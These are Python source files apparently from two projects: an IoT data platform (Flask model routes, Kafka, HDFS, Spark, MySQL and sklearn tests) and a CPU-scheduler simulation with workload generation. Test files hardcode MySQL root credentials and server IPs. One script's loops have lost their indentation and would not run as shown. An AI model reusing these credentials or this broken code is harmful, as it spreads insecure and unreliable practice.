            res['data'].append({
                'model_id': item[0],
                'model_name': item[1],
                'model_desc': item[2],
                'model_input': json.loads(item[3]),
                'model_path': item[4],
            })
        print(res)
        db.close()
        # NOTE(review): jsonify(str(res)) serialises the Python repr, not
        # real JSON; kept because existing clients may depend on it.
        resp = jsonify(str(res))
        resp.headers['Access-Control-Allow-Origin'] = '*'
        return resp
    except Exception as e:
        print(e)
        return get_error_resp(e)
@model.route('/create-model', methods=['GET','POST'])
def create_model():
    """Store an uploaded model .pkl file under model_path/<tenantId>/."""
    import os  # BUG FIX: os was never imported (`from config import *` does not provide it)
    assert request.method == 'POST', 'method must be post!'
    # NOTE(review): model_id is never assigned a real id, so the file is
    # saved as '.pkl'; confirm where the id was meant to come from.
    model_id = ''
    try:
        assert 'model_file' in request.files, 'no model file!'
        model_file = request.files['model_file']
        data = request.form
        assert 'tenantId' in data, 'missing parameters tenant id!'
        tenant_id = data['tenantId']
        tenant_dir = os.path.join(model_path, tenant_id)
        if not os.path.isdir(tenant_dir):
            os.makedirs(tenant_dir)  # also creates model_path when missing
        model_file_name = os.path.join(tenant_dir, model_id + '.pkl')
        model_file.save(model_file_name)
        # BUG FIX: the success path previously returned None, which Flask
        # treats as an error; respond like the other routes in this module.
        resp = jsonify(str({'status': 'create model success!'}))
        resp.headers['Access-Control-Allow-Origin'] = '*'
        return resp
    except Exception as e:
        print(e)
        return get_error_resp(e)
@model.route('/delete-model', methods=['GET', 'POST'])
def delete_model():
    """Delete the model row identified by tenantId + modelId."""
    try:
        data = {}
        if request.method == 'GET':
            data = request.args
        elif request.method == 'POST':
            data = request.form
        print(data)
        assert 'tenantId' in data, 'missing parameters tenant id!'
        tenant_id = int(data['tenantId'])
        assert 'modelId' in data, 'missing parameters model id!'
        model_id = int(data['modelId'])
        # BUG FIX: this previously built a SELECT statement, so the row was
        # never removed; int() on both ids also blocks SQL injection.
        sql_delete = "delete from data_model where tenant_id = %d and model_id = %d" % (tenant_id, model_id)
        db = mysql(**mysql_args)
        db.delete(sql_delete)
        db.close()
        resp = jsonify(str({'status': 'delete model success!'}))
        resp.headers['Access-Control-Allow-Origin'] = '*'
        return resp
    except Exception as e:
        print(e)
        return get_error_resp(e)
--- FILE SEPARATOR ---
# Smoke test: read one Spark output partition from HDFS over WebHDFS
# and print the raw bytes.
from hdfs import *
client = Client('http://39.104.186.210:50070')
file_path = '/data/device-data-1527513600000/part-00001'
with client.read(file_path) as fs:
    content = fs.read()
print(content)
--- FILE SEPARATOR ---
from kafka import KafkaConsumer, KafkaProducer
import json
# connect to Kafka server and pass the topic we want to consume 10.112.233.200
# Manual-polling alternative, kept for reference:
# msg = consumer.poll(timeout_ms=600 * 1000, max_records=1)
# msg.values()
# print(type(msg))
# print(list(msg.values()))
consumer = KafkaConsumer('deviceData',
                         bootstrap_servers=['kafka-service:9092'],
                         group_id='-2')
# Print every record and its UTF-8 decoded payload, forever.
for msg in consumer:
    print(msg)
    #print (msg.value.decode('ascii'))
    print(msg.value.decode('utf-8'))
    #break
--- FILE SEPARATOR ---
from kafka import KafkaConsumer, KafkaProducer
import json
# Producer used to push synthetic device readings into Kafka.
p = KafkaProducer(bootstrap_servers = ['kafka-service:9092'])
# Assign a topic
topic = 'deviceData'
import time
import random
# Two message templates; only data[0]['value'] is randomised per send.
a = {"deviceId": "1","tenantId": 1,"data": [{"key": "tem","ts": 1524708830000,"value": 1.00}]}
b = {"deviceId": "2","tenantId": 1,"data": [{"key": "hum","ts": 1524708830000,"value": 1.00}]}
def test():
    """Publish alternating random readings for devices 1 and 2 forever."""
    while (True):
        # Random value in [-1, 1) for device 1, then pause one second.
        a["data"][0]["value"] = random.random() * 2 - 1
        p.send(topic, json.dumps(a).encode())
        print(json.dumps(a))
        time.sleep(1)
        # NOTE(review): no sleep after this send, so b follows the next a
        # immediately on the following loop iteration.
        b["data"][0]["value"] = random.random() * 2 - 1
        p.send(topic, json.dumps(b).encode())
        print(json.dumps(b))
if __name__ == '__main__':
    test()
--- FILE SEPARATOR ---
"""
import pymysql
db = pymysql.connect('39.104.165.155', 'root', 'root', 'BUPT_IOT')
cursor = db.cursor()
sql = 'show tables'
cursor.execute(sql)
data = cursor.fetchall()
print(data)
sql = 'desc data_model'
cursor.execute(sql)
data = cursor.fetchall()
print(data)
"""
import db.mysql as mysql
db = mysql.mysql()
# da = list(db.select('show tables'))
# print(da)
# da = list(db.select('desc recent'))
# print(da)
# da = list(db.select('select * from data_model'))
# print(da)
import random
a = ['humidity', 'temperature', 'pressure', 'light', 'velocity', 'deformation']
b = ['1d', '3d', '1w', '1m']
for j in range(50):
for k in range(6):
for t in range(4):
db.insert("insert into recent_device values(2, '%s', %d, %d, %d, %f, '%s', '%s')" \
% (a[k],random.randint(100, 100000), random.randint(100, 10000000), random.randint(100, 10000000), random.random(),b[t], '2018-06-'+str(random.randint(1, 30))))
--- FILE SEPARATOR ---
# Load the iris toy dataset and split it 70/30 into train/test sets.
from sklearn import datasets
iris = datasets.load_iris()
X = iris.data
y = iris.target
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=42)
def linear_model():
    """Return an unfitted sklearn LinearRegression built with explicit defaults.

    NOTE(review): `normalize` was removed from LinearRegression in
    scikit-learn 1.2; this call only runs on older versions.
    """
    from sklearn.linear_model import LinearRegression
    # Define the linear regression model.
    model = LinearRegression(fit_intercept=True, normalize=False, copy_X=True, n_jobs=1)
    """
    参数
    ---
    fit_intercept:是否计算截距。False-模型没有截距
    normalize: 当fit_intercept设置为False时,该参数将被忽略。 如果为真,则回归前的回归系数X将通过减去平均值并除以l2-范数而归一化。
    n_jobs:指定线程数
    """
    return model
def logitic_model():
    """Return an unfitted LogisticRegression (liblinear solver, L2, C=1.0).

    NOTE(review): the name is a typo for "logistic" but is kept for
    compatibility with existing callers.
    """
    from sklearn.linear_model import LogisticRegression
    # Define the logistic regression model.
    model = LogisticRegression(penalty='l2', dual = False, tol = 0.0001, C = 1.0, \
        fit_intercept = True, intercept_scaling = 1, class_weight = None,\
        random_state = None, solver ='liblinear', max_iter = 100, multi_class ='ovr',\
        verbose = 0, warm_start = False, n_jobs = 1)
    """参数
    ---
    penalty:使用指定正则化项(默认:l2)
    dual: n_samples > n_features取False(默认)
    C:正则化强度的反,值越小正则化强度越大
    n_jobs: 指定线程数
    random_state:随机数生成器
    fit_intercept: 是否需要常量
    """
    return model
def bayes_model(model_type = 'm'):
    """Return an unfitted naive Bayes model.

    model_type: 'b' -> BernoulliNB, 'g' -> GaussianNB, anything else ->
    MultinomialNB (the default).
    """
    from sklearn import naive_bayes
    if model_type == 'b':
        model = naive_bayes.BernoulliNB(alpha=1.0, binarize=0.0, fit_prior=True, class_prior=None)
    elif model_type == 'g':
        model = naive_bayes.GaussianNB() # Gaussian naive Bayes
    else:
        model = naive_bayes.MultinomialNB(alpha=1.0, fit_prior=True, class_prior=None)
    """
    文本分类问题常用MultinomialNB
    参数
    ---
    alpha:平滑参数
    fit_prior:是否要学习类的先验概率;false-使用统一的先验概率
    class_prior: 是否指定类的先验概率;若指定则不能根据参数调整
    binarize: 二值化的阈值,若为None,则假设输入由二进制向量组成
    """
    return model
def tree_model():
    """Return an unfitted DecisionTreeClassifier (gini criterion, defaults).

    NOTE(review): `presort` and `min_impurity_split` were removed in newer
    scikit-learn releases; this call only runs on older versions.
    """
    from sklearn import tree
    model = tree.DecisionTreeClassifier(criterion='gini', max_depth = None,\
        min_samples_split = 2, min_samples_leaf = 1, min_weight_fraction_leaf = 0.0,\
        max_features = None, random_state = None, max_leaf_nodes = None, \
        min_impurity_decrease = 0.0, min_impurity_split = None,\
        class_weight = None, presort = False)
    """参数
    ---
    criterion :特征选择准则gini/entropy
    max_depth:树的最大深度,None-尽量下分
    min_samples_split:分裂内部节点,所需要的最小样本树
    min_samples_leaf:叶子节点所需要的最小样本数
    max_features: 寻找最优分割点时的最大特征数
    max_leaf_nodes:优先增长到最大叶子节点数
    min_impurity_decrease:如果这种分离导致杂质的减少大于或等于这个值,则节点将被拆分。
    """
    return model
def svm_model():
    """Return an unfitted SVC with an RBF kernel (C=1.0, gamma='auto')."""
    from sklearn.svm import SVC
    model = SVC(C=1.0, kernel='rbf', gamma ='auto')
    """参数
    ---
    C:误差项的惩罚参数C
    gamma: 核相关系数。浮点数,If gamma is ‘auto’ then 1/n_features will be used instead.
    """
    return model
def knn_model(model_type='cla'):
    """Return an unfitted k-nearest-neighbours model (k=5).

    model_type: 'cla' -> KNeighborsClassifier, anything else ->
    KNeighborsRegressor.
    """
    from sklearn import neighbors
    # Define the kNN model.
    if model_type == 'cla':
        model = neighbors.KNeighborsClassifier(n_neighbors=5, n_jobs=1) # classification
    else:
        model = neighbors.KNeighborsRegressor(n_neighbors=5, n_jobs=1) # regression
    """参数
    ---
    n_neighbors: 使用邻居的数目
    n_jobs:并行任务数
    """
    return model
def nn_test(model_type='cla'):
    """Return an unfitted multi-layer perceptron (relu + adam, max_iter=10000).

    model_type: 'cla' -> MLPClassifier, anything else -> MLPRegressor.
    """
    from sklearn.neural_network import MLPClassifier,MLPRegressor
    # Define the multi-layer perceptron model.
    if model_type == 'cla':
        model = MLPClassifier(activation='relu', solver='adam', alpha=0.0001, max_iter=10000)
    else:
        model = MLPRegressor(activation='relu', solver='adam', alpha=0.0001, max_iter=10000)
    """参数
    ---
    hidden_layer_sizes: 元祖
    activation:激活函数
    solver :优化算法{‘lbfgs’, ‘sgd’, ‘adam’}
    alpha:L2惩罚(正则化项)参数。
    """
    return model
def model_test(model):
    """Fit *model* on the module-level train split, then print the model's
    class name followed by its train/test accuracy scores."""
    model.fit(X_train, y_train)
    # str(type(model)) looks like "<class 'sklearn...Name'>"; the dotted
    # class path is the second-to-last piece when split on single quotes.
    name = str(type(model)).split('\'')[-2]
    print(name)
    train_score = model.score(X_train, y_train)
    test_score = model.score(X_test, y_test)
    print(train_score, test_score)
    print()
"""
model_test(linear_model())
model_test(logitic_model())
model_test(bayes_model('b'))
model_test(bayes_model('g'))
model_test(bayes_model('m'))
model_test(tree_model())
model_test(svm_model())
model_test(knn_model('cla'))
model_test(knn_model('reg'))
model_test(nn_test('cla'))
model_test(nn_test('reg'))
"""
import numpy as np
X = np.r_[np.random.random((5000,2)), np.random.random((5000,2))-1]
y = np.r_[np.ones(5000), np.zeros(5000)]
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=42)
"""
model_test(linear_model())
model_test(logitic_model())
model_test(bayes_model('b'))
model_test(bayes_model('g'))
# model_test(bayes_model('m'))
model_test(tree_model())
model_test(svm_model())
model_test(knn_model('cla'))
model_test(knn_model('reg'))
model_test(nn_test('cla'))
model_test(nn_test('reg'))
"""
model = logitic_model()
model.fit(X_train, y_train)
print(model.predict([[1,2]]))
print(X_train)
print(y_train)
from sklearn.externals import joblib
joblib.dump(model, '/home/spark/model/test.pkl')
model = joblib.load('model.pkl')
"""
print(model.score(X_test, y_test))
from sklearn.model_selection import validation_curve
train_score, test_score = validation_curve(model, X, y, 'C', [0.1,0.2,0.3,0.4], cv=None, scoring=None, n_jobs=1)
print(train_score)
print(test_score)
from sklearn.model_selection import cross_val_score
print(cross_val_score(model, X, y, scoring= 'precision', cv=None, n_jobs=1))
"""
--- FILE SEPARATOR ---
from pyspark.sql import SparkSession
from pyspark.ml.recommendation import ALS
from pyspark.ml import Pipeline
def test():
    """Train an ALS recommender on the MovieLens 100k ratings stored in HDFS
    and print predictions for a held-out 20% split."""
    spark = SparkSession \
        .builder \
        .appName("MovieRe") \
        .getOrCreate()
    #print(spark.sparkContext.getConf().getAll())
    # u.data is tab-separated: user id, item id, rating, timestamp; only the
    # first three columns are kept.
    rawData = spark.sparkContext.textFile("hdfs://10.108.218.64:9000/test/ml-100k/u.data") \
        .map(lambda line: line.split("\t")[0:3]) \
        .map(lambda item: (int(item[0]), int(item[1]), float(item[2]))) \
        .toDF(["user", "item", "rating"])
    training, test = rawData.randomSplit([0.8, 0.2])
    als = ALS().setMaxIter(10).setRank(50).setRegParam(0.01)
    pipeline = Pipeline().setStages([als])
    model = pipeline.fit(training)
    ret = model.transform(test)
    ret.select("user", "item", "rating", "prediction").show(100)
    print('yes')
if __name__ == "__main__":
    test()
--- FILE SEPARATOR ---
import pandas as pd
from sqlalchemy import create_engine
"""
engine = create_engine('mysql+pymysql://root:root@172.24.32.169:3306/BUPT_IOT')
# df = pd.DataFrame({'id':[1,None,3,None],'num':[None,34,None,89]})
# # 将新建的DataFrame储存为MySQL中的数据表,不储存index列
# df.to_sql(name='mydf', con=engine, if_exists='append',index= False)
df = pd.read_sql('mydf', engine)
print(df)
# sql = 'select * from mydf'
# sql = 'show tables'
# sql = 'desc app'
# df = pd.read_sql_query(sql, engine)
def get_tables(engine):
tables = pd.read_sql_query('show tables', engine)
for table_name in [tables.iloc[i, 0] for i in range(tables.shape[0])]:
table = {'table_name': table_name}
sql = 'desc %s' % table_name
each_table = pd.read_sql_query(sql, engine)
table['cloumns'] = [each_table.iloc[j, 0] for j in range(each_table.shape[0])]
yield table
def get_filter(cmp, value):
def _filter(x):
if cmp == '>':
return x > value
if cmp == '<':
return x < value
if cmp == '==':
return x == value
if cmp == '<=':
return x <= value
if cmp == '>=':
return x >= value
if cmp == '!=':
return x != value
if cmp == 'in':
return value in x
if cmp == 'not in':
return value not in x
return True
return _filter
#
# #过滤
# f = get_filter('=')
# df = df[f(df['id'])]
# # 删除指定列
# df.drop(['id','index'], axis=1, inplace=True)
# #去空值
# df.dropna(subset=['index', 'id', 'num'], inplace=True)
#缺失值填充
mean = df.mean()
median = df.median()
mode = df.mode().iloc[0]
print(mean['id'], median['id'], mode['id'])
df.fillna(mode, inplace=True)
#id
# df['test'] = df['id'].map(str) + '-' + df['num'].map(str)
# print(df)
# import json
# print(json.dumps(list(get_tables(engine))))
from numpy import nan as NaN
df1=pd.DataFrame([[1,2,3],[NaN,NaN,2],[NaN,NaN,NaN],[8,8,NaN]])
print(df1.fillna({0:10,1:20,2:'hah'}))
from etl.data import Data
args = {
# 'filter':[{'column':'id', 'cmp':'>=', 'value':3},
# {'column': 'num', 'cmp': '<', 'value': 89}],
#'drop':['index', 'id'],
#'dropna':['index'],
'fillna':[{'column':'index', 'value':'mean'},
{'column': 'id', 'value': 'mode'},
{'column': 'num', 'value': 10000},]}
data = Data('mydf', engine, args=args)
data.etl(target='test')
print(data.df)
"""
df = pd.DataFrame({"test":['123-456-789']})
print(df)
tmp = df['test'].str.split('-', expand=True)
rename = {i:'test_split_'+str(i) for i in tmp.columns}
tmp.rename(columns=rename, inplace=True)
print(df.join(tmp))
--- FILE SEPARATOR ---
import time
# Print the raw epoch time, the local struct_time, and a formatted
# timestamp one hour (3600 s) in the future.
print(time.time())
print(time.localtime())
# print(time.strftime("%Y-%m-%d %H:%M:%S", time.time()))  # invalid: strftime needs a struct_time
print(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(time.time()+3600)) )
"""
import json
a = '[1, 2, 3]'
print(json.loads(a))
a = [1, 2, 3]
print(json.dumps(a))
print(json.dumps({'1':1, 'a':"aaa"}))
a = ["tem", "hum"]
b = ["id1", "id2"]
c = []
for device_id, data_type in zip(b, a):
c.append({"device_id": device_id, "type": data_type})
print(json.dumps(c))
"""
"""
from kafka import KafkaConsumer, KafkaProducer
consumer = KafkaConsumer('2', bootstrap_servers = ['172.30.26.6:9092'], group_id = '-2', )
for msg in consumer:
print(msg)
#print (msg.value.decode('ascii'))
print(msg.value.decode('utf-8'))
"""
--- FILE SEPARATOR ---
import threading
import time
class MyThread(threading.Thread):
    """Demo thread that prints a heartbeat every second, forever."""
    def run(self):
        # Infinite loop: the thread never terminates on its own.
        while(True):
            time.sleep(1)
            print("son running")
if __name__ == '__main__':
    t = MyThread()
    t.start()
    print('main finished')
    # NOTE(review): the thread is non-daemonic, so the interpreter keeps
    # running the child loop even after exit(0) is requested here.
    exit(0)
--- FILE SEPARATOR ---
from util.cmd_util import exec_cmd
from flask import Flask, request, render_template, abort
from geventwebsocket.handler import WebSocketHandler
from gevent.pywsgi import WSGIServer
import json
from kafka import KafkaConsumer
import subprocess
app = Flask(__name__)
@app.route('/')
def index():
    """Render the index.html template."""
    return render_template('index.html')
@app.route('/statistics', methods=['GET', 'POST'])
def statistics():
    """WebSocket endpoint: launch a Spark statistics job, stream one result.

    Expects one JSON message carrying tenantId/deviceType/deviceId/
    startTime/endTime, spark-submits the job with those arguments, then
    forwards the first Kafka message from the tenant's topic back over the
    websocket.
    """
    if request.environ.get('wsgi.websocket'):
        ws = request.environ['wsgi.websocket']
        if ws is None:
            abort(404)
        else:
            try:
                message = ws.receive()
                print(message)
                jar_args = json.loads(message)
                args = ['spark-submit', '--class', 'edu.bupt.iot.spark.common.Statistics', '/home/spark/iot.jar']
                # Missing parameters default to '-1' for the Spark job.
                for key in ('tenantId', 'deviceType', 'deviceId', 'startTime', 'endTime'):
                    args.append(str(jar_args.get(key, '-1')))
                tenant = str(jar_args.get('tenantId', '-1'))
                # Subscribe before launching the job so the result isn't missed.
                consumer = KafkaConsumer(tenant,
                                         bootstrap_servers=['10.108.218.64:9092'],
                                         group_id=tenant,
                                         enable_auto_commit=False,
                                         auto_offset_reset='latest')
                print(args)
                popen = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
                # Forward only the first message, then stop consuming.
                for msg in consumer:
                    ws.send(msg.value.decode('utf-8'))
                    break
            # BUG FIX: narrowed the bare `except:` (which also swallowed
            # SystemExit/KeyboardInterrupt) and log the actual error.
            except Exception as e:
                print('error', e)
    return ''
@app.route('/websocket', methods=['GET', 'POST'])
def echo():
    """WebSocket echo endpoint: send back every received message until the
    socket is closed."""
    print(request.environ.get('wsgi.websocket'))
    if request.environ.get('wsgi.websocket'):
        ws = request.environ['wsgi.websocket']
        if ws is None:
            abort(404)
        else:
            while True:
                if ws.closed:
                    break
                message = ws.receive()
                print(message)
                ws.send(message)
    # BUG FIX: a Flask view must not return None; mirror /statistics and
    # return an empty body once the websocket loop ends.
    return ''
if __name__ == '__main__':
    # app.run(port=8989, host='0.0.0.0',debug=True)
    app.debug=True
    # gevent WSGI server with websocket support on all interfaces, port 8989.
    http_server = WSGIServer(('0.0.0.0', 8989), app, handler_class=WebSocketHandler)
    http_server.serve_forever()
|
[
"/config.py",
"/etl/data.py",
"/hdfs/file.py",
"/model.py",
"/test/hdfs_test.py",
"/test/kafka_consumer_test.py",
"/test/kafka_producer_test.py",
"/test/mysql_test.py",
"/test/sklearn_test.py",
"/test/spark_test.py",
"/test/sqlalchemy_test.py",
"/test/test.py",
"/test/thread_test.py",
"/test/websocket_test.py"
] |
00ricardo/Experimental-Methods-in-Computer-Science-Project
|
#!/usr/bin/env python3
# Synopsis
# ./gen_workload.py num_procs mean_io_bursts mean_iat min_CPU max_CPU min_IO max_IO
# Description
# Generate workload for CPU scheduler simulation.
# Interarrival times follow an exponential distribution with mean lambda.
# CPU and I/O bursts
#
# Workload format: one line per process, each containing a sequence of
# floating-point numbers of even length. In each line, the first number
# represents the arrival time of the process, and the remaining numbers
# represent the length of the CPU and I/O bursts that result from running
# the process. Since the processes must start and end with a CPU burst, the
# total number of bursts must be odd (and the number of numbers in each line
# must be even).
import sys
import numpy as np
def main(num_procs,mean_io_bursts,mean_iat,min_CPU,max_CPU,min_IO,max_IO,r_seed,file_name):
    """Generate a scheduler workload file and echo it to stdout.

    Writes 8 '#'-prefixed header lines recording the parameters, then one
    line per process: the arrival time followed by alternating CPU/IO burst
    lengths. Every process starts and ends with a CPU burst, so each data
    line holds an even count of numbers.

    Inter-arrival gaps ~ Exponential(mean_iat); IO bursts per process ~
    Poisson(mean_io_bursts); burst lengths ~ Uniform over the given ranges.
    The generator is deterministic for a fixed r_seed.
    """
    # BUG FIX: use a context manager so the file is closed even if a write
    # fails part-way through generation.
    with open(file_name, "wt") as f:
        # Parameter header (also echoed to stdout below).
        f.write('# seed = {0}\n'.format(r_seed))
        f.write('# num_procs = {0}\n'.format(num_procs))
        f.write('# mean_io_bursts = {0}\n'.format(mean_io_bursts))
        f.write('# mean_iat = {0}\n'.format(mean_iat))
        f.write('# min_CPU = {0}\n'.format(min_CPU))
        f.write('# max_CPU = {0}\n'.format(max_CPU))
        f.write('# min_IO = {0}\n'.format(min_IO))
        f.write('# max_IO = {0}\n'.format(max_IO))
        print("# file = %s" % file_name)
        print("# seed = %d" % r_seed)
        print("# num_procs = %d" % num_procs)
        print("# mean_io_bursts = %g" % mean_io_bursts)
        print("# mean_iat = %d" % mean_iat)
        print("# min_CPU = %g" % min_CPU)
        print("# max_CPU = %g" % max_CPU)
        print("# min_IO = %g" % min_IO)
        print("# max_IO = %g" % max_IO)
        np.random.seed(r_seed)
        t = 0.
        for i in range(num_procs):
            # Arrival times accumulate exponential inter-arrival gaps.
            t += np.random.exponential(mean_iat)
            print(t, end=' ')
            f.write('{0} '.format(t))
            io_bursts = np.random.poisson(mean_io_bursts) # Why Poisson? Why not?
            book_play = np.random.randint(10,12)
            for j in range(io_bursts):
                burst = np.random.uniform(min_CPU, max_CPU)
                # NOTE(review): CPU bursts past a random index (10-11) that are
                # more than 5 from the end are inflated 4-6x — appears to be a
                # deliberate skew injected into the workload; confirm intent.
                if j > book_play and io_bursts-j>5:
                    burst = burst*np.random.uniform(4, 6)
                print(burst, end=' ')
                f.write('{0} '.format(burst))
                burst = np.random.uniform(min_IO, max_IO)
                print(burst, end=' ')
                f.write('{0} '.format(burst))
            # Trailing CPU burst so every process ends on the CPU.
            burst = np.random.uniform(min_CPU, max_CPU)
            print(burst)
            f.write('{0}\n'.format(burst))
if __name__ == "__main__":
if len(sys.argv) == 10:
num_procs = int(sys.argv[1])
mean_io_bursts = int(sys.argv[2])
mean_iat = float(sys.argv[3])
min_CPU = float(sys.argv[4])
max_CPU = float(sys.argv[5])
min_IO = float(sys.argv[6])
max_IO = float(sys.argv[7])
r_seed = int(sys.argv[8])
file_name = sys.argv[9]
main(num_procs,mean_io_bursts,mean_iat,min_CPU,max_CPU,min_IO,max_IO,r_seed,file_name)
else:
raise Exception("The number of arguments should be 9.")
--- FILE SEPARATOR ---
import gen_workload as generator
import simulator as simulator
import xlsxwriter
import time
def save2Excel(workbook,worksheet_name, file_name):
    """Copy one simulation result file into a new worksheet of *workbook*.

    The first three lines of the file carry no data and are skipped; every
    remaining line is expected to hold 8 whitespace-separated numbers
    (PID, arrival, CPU/IO/total burst time, TAT, ready wait, IO wait).
    """
    worksheet = workbook.add_worksheet(worksheet_name)
    bold = workbook.add_format({'bold': True})
    titles = ('PID', 'Arrival Time', 'CPU Burst Time', 'IO Burst Time',
              'Bursts Time', 'Turn Around Time', 'Ready Wait Time', 'IO Wait Time')
    for cell, title in zip(('A1', 'B1', 'C1', 'D1', 'E1', 'F1', 'G1', 'H1'), titles):
        worksheet.write(cell, title, bold)
    with open(file_name, "r") as f:
        # Skip the three header lines that have no data.
        for _ in range(3):
            f.readline()
        row = 1  # first data row in the sheet (row 0 holds the titles)
        for line in f:
            values = [float(token) for token in line.split()]
            for col in range(8):
                worksheet.write(row, col, values[col])
            row += 1
def parseSimulations():
    """Collect every simulation listed in Results/simulations.txt into the
    per-scheduler Excel workbooks, one worksheet per workload file.

    Each line of simulations.txt holds three fields:
    <simulation file> <target workbook path> <worksheet name>.
    """
    targets = ("Results/fcfs_results.xlsx",
               "Results/sjf_results.xlsx",
               "Results/srtf_results.xlsx",
               "Results/rr5_results.xlsx",
               "Results/rr10_results.xlsx",
               "Results/rr15_results.xlsx")
    # One workbook per known target path, keyed by that path.
    workbooks = {path: xlsxwriter.Workbook(path) for path in targets}
    with open("Results/simulations.txt", "r") as f:
        for line in f:
            fields = line.split()
            if fields[1] not in workbooks:
                raise ValueError("Unknown workbook")
            save2Excel(workbooks[fields[1]], fields[2], fields[0])
    for workbook in workbooks.values():
        workbook.close()
def _run_seed_batch(f, num_procs, mean_io_bursts, mean_iat, min_CPU, max_CPU, min_IO, max_IO, quantum):
    """Generate workloads for seeds 0..29 at *num_procs* and run every scheduler.

    For each seed: fcfs/sjf/srtf run with the incoming *quantum* (None on the
    very first call, matching the historical behaviour where non-RR schedulers
    ignore it), then RR runs with quantum 5. Results are appended to *f*.
    Returns the quantum in effect afterwards (always 5).
    """
    for seed in range(30):
        input_file = "Workloads/seed{0}_procs{1}.txt".format(seed, num_procs)
        generator.main(num_procs, mean_io_bursts, mean_iat, min_CPU, max_CPU, min_IO, max_IO, seed, input_file)
        for scheduler in ('fcfs', 'sjf', 'srtf'):
            output_file = "Simulations/seed{0}_procs{1}_{2}.txt".format(seed, num_procs, scheduler)
            simulator.main(scheduler, quantum, input_file, output_file)
            f.write("{0} {1} {2}\n".format(output_file, "Results/{0}_results.xlsx".format(scheduler), "seed{0}_procs{1}.txt".format(seed, num_procs)))
        quantum = 5
        scheduler = 'rr'
        output_file = "Simulations/seed{0}_procs{1}_{2}.txt".format(seed, num_procs, scheduler)
        simulator.main(scheduler, quantum, input_file, output_file)
        f.write("{0} {1} {2}\n".format(output_file, "Results/{0}{1}_results.xlsx".format(scheduler, quantum), "seed{0}_procs{1}.txt".format(seed, num_procs)))
    return quantum

def chess_simulations():
    """Run the full simulation sweep: 30 seeds x 4 workload sizes x 4 schedulers.

    Workload parameters are fixed; only num_procs varies (10/150/500/1000).
    Every run is logged to Results/simulations.txt in the format consumed by
    parseSimulations().

    Refactored: the four copy-pasted 30-seed loops are now one helper,
    and the log file is closed even if a simulation raises.
    """
    mean_io_bursts = 40
    mean_iat = 500
    min_CPU = 4
    max_CPU = 6
    min_IO = 5
    max_IO = 10
    quantum = None  # the very first fcfs/sjf/srtf runs receive None, as before
    f = open("Results/simulations.txt", "a+")
    try:
        for num_procs in (10, 150, 500, 1000):
            quantum = _run_seed_batch(f, num_procs, mean_io_bursts, mean_iat,
                                      min_CPU, max_CPU, min_IO, max_IO, quantum)
    finally:
        f.close()
# Script entry point: regenerate every workload and run all four schedulers
# over them (see chess_simulations above); parseSimulations post-processes
# the result files and is disabled by default.
if __name__ == "__main__":
    #parseSimulations()
    chess_simulations()
    print("DONE")
--- FILE SEPARATOR ---
#!/usr/bin/env python3
#
# Simulator for a CPU and I/O scheduling system assuming a single
# CPU and I/O. The CPU scheduler uses one of the following
# scheduling algorithms: First Come First Served (FCFS), Round Round
# (RR), Shortest Job First (SJF), and Shortest Remaining Time First
# (SRTF). Note that the last two require knowing the burst sizes in
# advance, which is not realistic in computer process scheduling. The
# I/O scheduler always follows a FCFS mechanism.
#
# Workload format: one line per process, each containing a sequence of
# floating-point numbers of even length. In each line, the first
# number represents the arrival time of the process, and the remaining
# numbers represent the length of the CPU and I/O bursts that result
# from running the process. Since the processes must start and end
# with a CPU burst, the total number of bursts must be odd (and the
# number of numbers in each line must be even).
#
# Output format: one line per process, each containing a sequence of
# numbers separated by spaces. The first number gives the process id
# (defined by the order in the workload file). The second number is
# the arrival time of the process. Then the next three numbers give
# the sum of all cpu bursts, the sum of all io bursts, and the sum all
# bursts respectively. The last three values given the Turn Around
# Time (TAT), i.e. the wall clock time, the Ready wait time, i.e. the
# time the process spent in the CPU scheduling queue ready to run, and
# the I/O wait time, i.e. the time the process spent in I/O.
import sys
import argparse
import salabim as sim
import numpy as np
def read_workload(file):
    """Parse a workload file into a list of Process objects.

    Each non-comment line holds the arrival time followed by alternating
    CPU/I-O burst lengths (see the module header for the format).  Lines
    starting with '#' and blank lines are skipped; pids are assigned in
    file order.

    file: path to the workload file, or None to read from stdin.
    """
    f = sys.stdin if file is None else open(file, "r")
    pid = 0
    procs = []
    try:
        for l in f:
            stripped = l.strip()
            # Skip comments and blank lines (a blank line used to crash on vals[0]).
            if not stripped or stripped.startswith("#"):
                continue
            vals = [float(x) for x in stripped.split()]
            procs.append(Process(pid = pid, arrival = vals[0], bursts = vals[1:]))
            pid += 1
    finally:
        # Close only files we opened ourselves; never close sys.stdin.
        if f is not sys.stdin:
            f.close()
    return procs
class Process:
    """Plain record for one workload entry: a pid, an arrival time and the
    odd-length list of alternating CPU/I-O burst durations."""

    def __init__(self, pid, arrival, bursts):
        self.pid, self.arrival, self.bursts = pid, arrival, bursts
class Simulator:
    """Drives one simulation run.

    Builds the salabim environment, a single CPU resource (preemptive when
    the scheduler is SRTF) and a single FCFS I/O resource, then queues all
    workload processes via ProcessArrival.  Per-process result lines are
    written to *ofile* (a path), or to stdout when ofile is None.

    Raises ValueError when quantum is missing for "rr" or non-positive.
    """

    def __init__(self, processes, cpu_scheduler, quantum = None, ofile = None):
        self.cpu_scheduler = cpu_scheduler
        self.quantum = quantum  # time slice; only meaningful for round robin
        if self.cpu_scheduler == "rr" and self.quantum is None:
            raise ValueError("Quantum parameter is required for round robin")
        if self.quantum is not None and self.quantum <= 0:
            raise ValueError("Quantum parameter needs to be a positive (non-zero) value")
        self.processes = processes
        processes.sort(key = lambda x: x.arrival)  # in-place: the caller's list ends up sorted too
        self.ofile = sys.stdout if ofile is None else open(ofile, "w")
        print("# Cpu scheduler: %s" % self.cpu_scheduler, file = self.ofile)
        print("# Quantum: %s" % self.quantum, file = self.ofile)
        self.env = sim.Environment(trace = False)
        self.cpu = sim.Resource("CPU", capacity = 1, preemptive = self.cpu_scheduler == "srtf")
        self.io = sim.Resource("I/O", capacity = 1)
        ProcessArrival(simulator = self)

    def __del__(self):
        # getattr guard: __init__ may have raised (e.g. missing quantum) before
        # self.ofile existed; the old code crashed with AttributeError here.
        if getattr(self, "ofile", sys.stdout) is not sys.stdout:
            self.ofile.close()

    def run(self):
        """Print the column-header row and run the event loop to completion."""
        print("pid arrival_time cpu_bursts_time io_bursts_time bursts_time tat ready_wait_time io_wait_time", file = self.ofile)
